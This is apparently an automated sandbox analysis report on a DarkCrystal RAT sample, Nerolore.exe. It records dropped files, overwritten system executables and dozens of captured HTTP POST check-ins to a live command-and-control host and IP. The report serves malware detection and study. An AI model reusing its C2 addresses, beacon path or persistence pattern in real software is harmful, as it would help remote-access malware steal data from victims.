                              Source: Nerolore.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\FontHost\ContainerAgentWinSession.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\54f8e4f5b93f5aJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeDirectory created: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exeJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeDirectory created: C:\Program Files\7-Zip\Lang\54f8e4f5b93f5aJump to behavior
                              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Nerolore.exe, Nerolore.exe, 00000000.00000002.2093071531.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.pdb source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.pdb source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49712 -> 80.211.144.156:80
                              Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                              Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1808Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1808Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 134140Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1816Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1808Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2504Expect: 100-continue
